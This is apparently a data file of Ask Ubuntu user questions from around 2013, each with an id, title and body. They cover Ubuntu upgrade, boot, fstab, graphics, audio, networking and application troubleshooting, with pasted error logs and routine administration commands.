380128	unbuntu lets me know an upgrade is available ; never installs it	i use lubuntu . for the past few weeks i 've been getting a notification that a new version of the os is available , but whenever i hit `` upgrade '' it does nothing . at first i overlooked it since i thought maybe i 'd noticed something new as i restarted my computer , but upon doing that -- and more -- the notification for me to upgrade keeps popping up , and i keep authenticating it without it ever going through . since this is a problem with the software updater itself , the ubuntu instructions did n't help , since it says to simply use software updater , bringing me back to the problem . so what 's the goof ?
380131	how do i get a programs to start up at boot ?	i would like for apache2 to start whenever the computer is booted . i 'm using ubuntu 13.10 . to get apache to start , i run this command in terminal : sudo /usr/local/apache2/bin/apachectl start i will probably need step-by-step directions .
380137	error mounting my additional partitions after editing fstab ?	new user here , having an issue automounting my extra partitions . i 'm dual-booting xubuntu and windows7 , and i have a bunch of partitions : a 60gb ext4 partition for `` / '' .. a 60gb ntfs partition for windows7 install.. a 200gb ext4 patition for extra linux space.. a 200gb ntfs patition for extra windows space.. a 350gb ntfs partition for shared data that 's meant to be shared.. as of now , both xubuntu and windows7 have been installed and are working as expected ( for the most part ) . however , i 've been having difficulty automounting my 200gb ext4 and 350gb ntfs partitions through editing fstab ! here 's what i 'm getting back from blkid ; /dev/sda1 : label= '' system reserved '' uuid= '' 9a064e1e064dfc2f '' type= '' ntfs '' /dev/sda2 : uuid= '' 48e255e5e255d7b0 '' type= '' ntfs '' /dev/sda3 : uuid= '' a9ab4b02-1784-4ece-a610-d5d50c25a76f '' type= '' ext4 '' /dev/sda5 : uuid= '' 8588e674-b37a-4dd4-9126-c329d80c60dc '' type= '' swap '' /dev/sdb5 : label= '' linux_extra_01 '' uuid= '' b05b74c0-5e1e-4e60-a712-2f8f43dd6682 '' type= '' ext2 '' /dev/sdb6 : label= '' win_extra_01 '' uuid= '' 146553585fd8f2b5 '' type= '' ntfs '' /dev/sdb7 : label= '' shared_01 '' uuid= '' 0269d46c148c27ce '' type= '' ntfs '' my xubuntu `` / '' is sda3 , my extra space is sdb5 , and my shared data is sdb7.. i knew that i needed some mount points , so i made two new directories inside /mnt.. /mnt/expansion_01 for my extra linux-specific data . /mnt/shared_01 for my shared non-os-specific data ( media , music , videos , etc.. ) . while looking at a few guides , i tried editing my fstab.. # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda3 during installation uuid=a9ab4b02-1784-4ece-a610-d5d50c25a76f / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=8588e674-b37a-4dd4-9126-c329d80c60dc none swap sw 0 0 # linux extra partition 01 [ /dev/sdb5 ] .. uuid=b05b74c0-5e1e-4e60-a712-2f8f43dd6682 /mnt/expansion_01 ext4 defaults 0 2 # ntfs shared partition 01 with windows [ /dev/sdb7 ] .. uuid=0269d46c148c27ce /mnt/shared_01 auto , user , exec , nls=utf8 , umask=003 , gid=46 , uid=1000 0 2 however , when xubuntu starts up , i get an error message that the partitions have failed to mount , prompting me to press s or m to either skip or manually fix them . as this is my first time ever messing around with partitions and mounting , and i 'm still very much a linux newbie , it 's very possible that i 've overlooked something or made a simple mistake somewhere ! did i do something wrong ? what 's wrong here ?
380138	tmpfs for /var/cache	when i use the tmpfs set for /var/cache and i reboot the computer and then once the computer has booted back into the ubuntu 13.10 and login and goto run the ubuntu software center it loads for about 2 seconds and then crashes out . my system is a intel i7 16gb memory 1 x ocz-ssd drive 120gb boot drive , with trim enabled in os 1 x wd-hdd drive 250gb user drive here is the tmpfs line that i add to the fstab file : tmpfs /var/cache tmpfs defaults , noatime , mode=0755 0 0 and also tried tmpfs /var/cache tmpfs defaults , noatime , mode=1777 0 0 when i remove the above line ( s ) the ubuntu software-center works fine..
380140	xubuntu 13.10 64bit - slow and buggy `` log out '' process ?	i 'm a windows convert who has done only a little bit of dabbling in ubuntu in the past ( back in dapper drake a few years back ) . a lot has changes since then , and i 've been yearning to jump back into linux again ! so , having just bought a new ssd , i felt that this would be as good of a time as any to set up a dual-boot system again . i 've messed around with ubuntu 13.10 a bit , and while unity has its issues , i think that it still needs some time to develop . i looked into xfce and liked it a lot , so i went with xubuntu . i 've installed xubuntu , and for the most part it 's running smoothly and it a pleasure to work with . the customization is great and the minimalistic look and feel is really nice ! but here 's my problem , whenever i select the `` log out '' option from either the application menu , or the user profiles menu , my pc comes to a crawl , and the dialog box with all the options ( shut down , restart , log out , etc . ) takes maybe a minute or more to appear . i click the log out button , my pc is brought to a snail 's pace , and i have to wait for what seems like an eternity for the logout options to appear ! if i try to open something else ( even a terminal window ) while it 's loading the logout options , that other program wo n't finish loading until the logout screen finally appears . keep in mind , this is a pretty much vanilla install of xubuntu 13.10 64bit , on a pc with an intel i7 , an ssd , 6gb ddr3 ram , and a new amd 7770 gpu ( drivers have n't been installed yet , though ) . everything else runs fast , most applications open near-instantly ! it must be an issue with how the logout options screen initializes or something , but i 'm not sure exactly how i can fix it.. edit - extra info : this problem is very consistent when using the `` log out '' buttons in xubuntu . however , i 've found that i 'm able to reboot and shutdown much more quickly by going through the `` switch user '' screen , and using the reboot or shutdown buttons on that screen . i 'm nearly certain that it has something to do with the little log out options screen that appears when i select log out from the menu , and not the actual process of shutting down.. so what should i do ? i really like xfce so far , and i 've never tried a non-ubuntu based distro before , but should i just switch to something else ? is there any known fix for this issue ? are there any work-arounds for logging out/shutting down/rebooting via the terminal so that i can avoid this irritating bug ? is there any that i can monitor the progress of the log out via terminal , allowing me to see which parts are causing the slow-down ? what is the best way to report this bug to someone ?
380143	after installation issues	i have been playing with ubuntu since 8.04 and have several servers running 64bit 12.04lts full time . i have used desktop on and off over this time period but have never committed any machine to running desktop full time . i have a hp dv9000 with amd athlon x2 and nvidia which i have used with vista , ubuntu studio , 7 , and now trying to get 13.10 to run on it without success . after trying both the 64bit and 32bit versions i decided to try 32bit ubuntu gnome . it is running ok , but is still somewhat glitchy . after my first attempt , i did some digging and found out that there are some driver-related issues and would need to install the nvidia drivers . during the next attempt to run ubuntu unity i would alt+shift+f1 to get to a terminal and install the drivers . reboot , and try to go in to unity . it would `` work '' for a short amount of time , usually less than 5 minutes , then everything would freeze on the desktop but the mouse . i could n't get anything to happen or access a terminal . the only way to get out of the situation was to force-restart the system . i have been playing with gnome version for the last 2 days and , while it sometimes freezes , it seems to run far more reliably . i can open multiple programs and switch between them , use email , the internet , all things i was unable to do under unity . so , i decided to install unity on the working gnome install and , no surprise , it started having the exact same problems when i logged in to it . however , the gnome environment was the same as before . this machine was running win 7 fine before i decided to make it my first full-time ubuntu desktop machine , so i am leaning towards a hardware compatibility issue between ubuntu 13.10 and the dv9000 .
380144	wine ole & odbc error while installing electronicwatchman	encountered the following error while trying to install a software called electronicwatchman ( http : //electronicwatchman.in/21.ewatchman_access_17jan_2013.rar ) in wine1.7 fixme : olepicture : oleloadpictureex ( 0xbe9fbc,334,1 , { 7bf80980-bf32-101a-8bbb-00aa00300cab } , x=0 , y=0 , f=0,0x32f22c ) , partially implemented . fixme : olepicture : oleloadpictureex ( 0xbe9fbc,782,1 , { 7bf80980-bf32-101a-8bbb-00aa00300cab } , x=0 , y=0 , f=0,0x32f1fc ) , partially implemented . fixme : odbc : sqlconfigdatasource ( nil ) 4 `` microsoft access driver ( *.mdb ) '' `` dsn=ewatchmandsn '' err : ole : cogetclassobject class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : create_server class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : cogetclassobject no class object { 00000514-0000-0010-8000-00aa006d2ea4 } could be created for context 0x5 err : ole : cogetclassobject class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : create_server class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : cogetclassobject no class object { 00000514-0000-0010-8000-00aa006d2ea4 } could be created for context 0x5 err : ole : cogetclassobject class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : create_server class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : cogetclassobject no class object { 00000514-0000-0010-8000-00aa006d2ea4 } could be created for context 0x5 err : ole : cogetclassobject class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : create_server class { 00000514-0000-0010-8000-00aa006d2ea4 } not registered err : ole : cogetclassobject no class object { 00000514-0000-0010-8000-00aa006d2ea4 } could be created for context 0x5 fixme : olepicture : olepictureimpl_findconnectionpoint no connection point for { 33ad4f92-6699-11cf-b70c-00aa0060d393 } would appreciate any solutions to this issue .
380148	i 'll burn the cd to 12.04 but when i go to install it i 'll get all the way to a blank purple screen . cant do anything after that	help . that 's about as far as i can explain it . i can see that it goes through the installation . then when its done . the purple screen is what gets me
380149	grub does not load up even after running boot-repair	i had a successfully running computer with dual booting windows 8 and ubuntu 13.04 until i made the drastic decision to upgrade windows 8 to 8.1 . the upgrade to windows 8.1 was fine but i discovered that grub was not loading . so using a live cd i managed to run boot-repair to repair the efi partition ( just like when i first installed ubuntu about few months ago ) . however this time even after running boot-repair with recommended settings , windows 8.1 keeps booting rather than grub . cheers
380150	shift plus space key does n't work	turns out that shift + space key does n't work ( for spaces , often times my finger lingers on the shift key after typing `` i '' for instance and the space key does n't respond ) quite as i expect it to . my guess is that it 's mapped to some shortcut key . if this is the case , how do i remap it ? i 'm using gnome 3 running ubuntu 13.10 . would like to map this back to space . i.e . i want to press shift+space space and type an actual space rather than invoking the shortcut .
380152	unity is started after a reboot in 13.10	i have tried a lot of ways but not able to solve this problem . i have to open a terminal and enter command unity . lucky i have right click to open a command , otherwise i do n't know how to post this question . i have tried the following link solutions : webupd8.org omgubuntu.co.uk dash not working after upgrade to 13.10 unity is n't starting on 13.10 ( with cinnamon 2.0 installed ) ubuntu 13.10 unity does n't load after upgrade ubuntuhandbook.org however , i did a upgrade since the day ubuntu 13.10 released.and this issue just happen since yesterday . here is my log from unity command compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : commands compiz ( core ) - info : starting plugin : commands compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2013-11-21 09:31:02 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2013-11-21 09:31:02 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... warn 2013-11-21 09:31:02 xim.controller ximcontroller.cpp:90 ibus natively supported . warn 2013-11-21 09:31:02 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/google-chrome.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-11-21 09:31:02 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2013-11-21 09:31:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2013-11-21 09:31:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct created new window in existing browser session . error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atk_object_ref_state_set : assertion 'atk_is_object ( accessible ) ' failed error 2013-11-21 09:42:51 unity < unknown > :0 atk_state_set_contains_state : assertion 'atk_is_state_set ( set ) ' failed error 2013-11-21 09:42:51 unity.glib-gobject < unknown > :0 g_object_unref : assertion 'g_is_object ( object ) ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed error 2013-11-21 09:42:52 unity < unknown > :0 atkobject* unity_a11y_get_accessible ( nux : :object* ) : assertion 'object ! = null ' failed
380153	how can i change ubutnu to low resolution ( vga ) mode	my tv wo n't work with ubuntu it just blacks out and says not support i remember it did this with windows also but i just had to switch to low resolution mode i really want to start using ubuntu but ca n't unless i figure this out would i do the same as with windows 7 and just hold f8 well it starts up after i install it ?
380155	run a script as non-root user	i want to run a script say some_script.sh ( that requires root permissions , contains some sudo do something in a for loop ) as non-root user . i have a script as shown below . i want to run this script as root and using this i want to run the other one some_script.sh . # ! /bin/bash while true do if [ some conditioon ] then sudo some_script.sh & sleep 30 else exit 0 fi done note some_script.sh is in path and i want that to go on checking at each 30 sec it is executing smoothly if i run some_script.sh from terminal as sudo some_script.sh , when i am going to run it using above script it is doing its job partially . is it possible to do like this ? if yes then what are the problems above , show me any better way . edit please take a look at this . please read some_script.sh as msgpass.sh of that answer .
380156	when i boot from install usb the colours are all messed up , and the resolution is to high	when i booted into the ubuntu usb , the colours were all very messed up compared to how it looked the last time i installed ubuntu to a desktop pc , but the resolution was too high , and i could not see the whole install window , and the install button was missing , so i am wondering , how do i fix this problem ? i am installing on an hp laptop : model : hp pavilion dv6500 ram : 2gb processor : amd turion 64 x2 mobile technology tl-58 graphics card : nvidia ( i have no idea what the model is ) wireless card : broadcom wireless ( i have no idea what model it is )
380158	boot failure after fallback grapihcs driver does n't load - ca n't figure out how to fix problem via live disk	i 'm almost positive the issue is that there are 2 graphics kernels , however i ca n't get past the boot to rectify the situation . i tried via terminal on a live cd but i ca n't figure out how to run the terminal as my user name instead of just the standard ubuntu live disk user .
380169	why wont my 360 controller recognise	okay so i 've done alot of trial and error on the subject of gaming on ubuntu and mint , all on fresh installs fully updated . lately i installed the latest ubuntu lts 64 bit on my rig . i installed all updates , my 32 bit libraries , steam , and my amd graphics driver first off . then i installed team fortress 2 on steam . i 've heard a lot of peoples controllers work right off the bat on steam but all of mine did not . my controllers are as follows : -blue rock candy brand 360 controller -official microsoft hard wired 360 controller -white powera brand micro 360 controller okay so first its plugged in and it shows the first player light on like it should be working . all of them do this so that 's good i assume as the driver at least detects it in someway as its not just blindly blinking . so i go into tf2 to see if it works . the options wont detect any input and when i bring up valve 's console and exec 360controller everything says all joy buttons are not valid keys . so i do some digging and ran across this makeuseof.com page . i used the command to see if it would list my pad anywhere but it said just usbcore driver no `` led device '' or `` pad1 '' just nothing . i have tried both my usb 2.0 & 3.0 ports obviously this is a driver problem of sorts any help would be highly appreciated . my computer 's hardware is as follows : am3 amd phenom x4 965 3.4 cpu * his radeon hd 7750 pci ex * 2013 msi 970a-g43 mainboard * 8gb ddr3 ram gskill ripjaws * 5.1 diamond extreme sound pci sound card . i will be digging into this issue as i have been this week in other words what should i do ? please :3 i will be quick to respond and will post things as i find them .
380170	create usb installation without requiring iso	currently i try to create my own ubuntu based distribution . when i use tools like customizer i always have to create an iso before i can test it with qemu or copy it to usb drive . how can i skip the iso build step and emulate with quemu / copy to usb directly ? do you know any good instructions to customize and build using command line ?
380171	qt4 files : file or directory not found	i installed qt4 and now can see its files in /usr/include/qt4 but when i am compiling the `` c '' code , it gave error that qwidget : file or directory not found although this qwidget is present in the path /usr/include/qt4/qtgui/qwidget so then i put the whole path in the file . but then it gave error that the files inside the qwidget are also unable to find , even though the files are present in the path . can anyone please tell me how can i solve this issue ? for the record , i used these commands sudo apt-get install libqt4-core sudo apt-get install libqt4-dbg sudo apt-get install libqt4-dev sudo apt-get install libqt4-gui
380173	ubuntu does not start . dual boot win 8.1	getting black screen with following single line : 21503.538140-hide generic 0005.046d.b007.0003 unknown main item tag 0x0
380174	legacy laptop install	i have an old laptop that runs windows 2000 . it has no internet connection , a cd drive ( will not read dvd 's ) , and will not boot from usb . is there a way i can get the full install file onto my usb drive and transfer it to the laptop and do the install from the desktop ?
380175	qjackctl sees my device but does n't recognize it ?	i select my usb device as it does show but qjackctl wont start because it does n't recognize it ( i think ) . here is what is said . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 21:45:20.128 alsa connection graph change . 21:45:25.480 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started wed nov 20 21:45:25 2013 : starting jack server ... wed nov 20 21:45:25 2013 : jack server starting in realtime mode with priority 10 wed nov 20 21:45:25 2013 : control device hw:2 wed nov 20 21:45:25 2013 : [ 1m [ 31merror : control open `` hw:2 '' ( no such file or directory ) [ 0m wed nov 20 21:45:25 2013 : control device hw:2 wed nov 20 21:45:25 2013 : [ 1m [ 31merror : control open `` hw:2 '' ( no such file or directory ) [ 0m wed nov 20 21:45:25 2013 : [ 1m [ 31merror : failed to acquire device name : audio-1 error : can not allocate memory [ 0m wed nov 20 21:45:25 2013 : [ 1m [ 31merror : audio device hw:2 can not be acquired ... [ 0m wed nov 20 21:45:25 2013 : [ 1m [ 31merror : can not initialize driver [ 0m wed nov 20 21:45:25 2013 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m wed nov 20 21:45:25 2013 : [ 1m [ 31merror : failed to open server [ 0m wed nov 20 21:45:26 2013 : saving settings to `` /home/luke/.config/jack/conf.xml '' ... 21:45:31.797 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started
380176	i can not log into gnome	i can log in to my server every way except through the gnome gui and i am not sure why . any help would help .
380182	issue connecting wirelessly in ubuntu server 12.04	my mom just got a new computer and was going to throw her old one away since it 's so old she wo n't get anything for it . so , i felt like giving myself a little project , and decided to make a server out of the old box . the installation went well except for one part ; the part where it configured the network . i connected a usb wireless adapter , and told it to install without network configuration . figured i could just configure it later . guess i was wrong . i did everything i thought i should do : sudo ifconfig wlan0 up sudo iwconfig wlan0 essid network-name key s : network-key sudo dhclient wlan0 everything worked until i did the dhclient . it just hangs there until until i manually stop it . what can/should i do ?
380183	elf header smaller than expected	i am running ubuntu 12.04 lts lamp server , and it wo n't boot . this problem started when i was trying to clean up /root and accidentally deleted all of the kernels using apt-get remove . i was able to restore the latest kernel , but now i get `` elf header smaller than expected '' when i try to boot from the hard drive . this system has a 2 tb drive , so it uses lvm . i restored the kernel by using the instructions on this page how to restore a system after accidentally removing all kernels ? but i also had to use the instructions on this page in order to mount the file system using lvm2 and do a chroot : http : //linuxwave.blogspot.com/2007/11/mounting-lvm-disk-using-ubuntu-livecd.html after restoring the kernel and getting the grub error , i tried using https : //help.ubuntu.com/community/boot-repair . i booted from the live cd , mounted the file system , chrooted to it , and installed and ran boot-repair . that did n't solve the problem . i also tried doing this while chrooted to the file system : rm -rf /boot/grub/* apt-get install grub grub-install /dev/sda update-initramfs -c -k all update-grub the problem persists . what do you need to see to help me solve the problem ? update here 's the information from boot-repair : http : //paste.ubuntu.com/6451685/
380188	problems in dual booting windows 8 and ubuntu on lenovo g500s	i turned off the fast boot option as well as the secure boot option . i have set bios mode to legacy support and boot priority is set to legacy first . and i installed ubuntu in separate partition . it got installed correctly . but when i start my laptop it shows grub window and asks me to select the os . if i select ubuntu it starts without any error but i select windows 8 then it gives an error unable to load windows . please insert disk and select the repair option . but when i press alt+ctrl+del and then go to boot manager by pressing fn+f12 and if i select windows boot loader then windows start without any error . so both os are working but not from grub window . so can suggest me a solution for this ?
380191	applications getting disappeared after minimizing them in ubuntu 12.04 lts	just now i downloaded zend studio and opened it . after some time i minimised it and i do not see it anywhere . if i try to reopen it , it will show that it is already been open and in use . how to see where the minimized application is running ?
380194	ubuntu touch for aakash 2 ubislate tablets	i know that , ubuntu touch ca n't support aakash tablet hardware , but any solution for install ubuntu touch 13 on aakash 2 tablet in 512 mb ram and 2 gb sd card . if you have any idea then plz suggest me .
380195	how do i remap the ijkl keys to arrow keys when i hold alt down ?	i need to remap ijkl to the arrow keys while alt is down . also , modifiers should still work ie : shift+ctrl+alt+l should map to shift+ctrl+rightarrow i was able to get this working using xbindkeys + xvkbd , but it was n't working well because it looks like i lose focus every time it sends input , and it did n't work at all in the terminal .
380196	network manager applet not showing configured networks	i 'm running kubuntu and have updated to 13.10 . i 've got a wireless ap set up , and i also have an ubuntu-based server for testing and so forth . i have two entries in my network manager - one which connected automatically to the ap , and was configured by dhcp . the other connected to the same ap , but had manual entries for the ip address , dns servers and so forth - so i could use the server mentioned above . the network manager applet used to show both these entries ( and more ) , and i was able to switch between them easily . now the network manager is only showing the active connection , and every other wireless access point in the city . is there a way to make the entry in network manager show up in the applet ? or some other way to achieve this . i do n't run the server all the time - i use it to test updates and try out new software and so forth . cheers , don
380199	converting images into video	i found a method on internet to use avconv to make a video from images , but the quality is very poor . i set the resolution but it did n't help . avconv -i `` franc % 04d.jpg '' -r 30 -s : v 1280x720 a.mkv how can i choose the image compression and set the quality to best ?
380201	printing problem	right now my office use ubuntu as the operating software . we use network by cable between pcs and the printers in the office are installed on my friends pcs . what i want to ask is why i must restart my pc before i can print document ? it 's become annoying when you need to restart your computer before print the document especially when in an urgent situation .
380203	is there a internet usage logging software for ubuntu ?	i want a software that is able to log the bandwidth usage of every app using the internet and also that of the whole system . it does n't necessarily have to log technical details like ports , but it 'd be good if it could . bandwidth usage monitor is the thing i need .
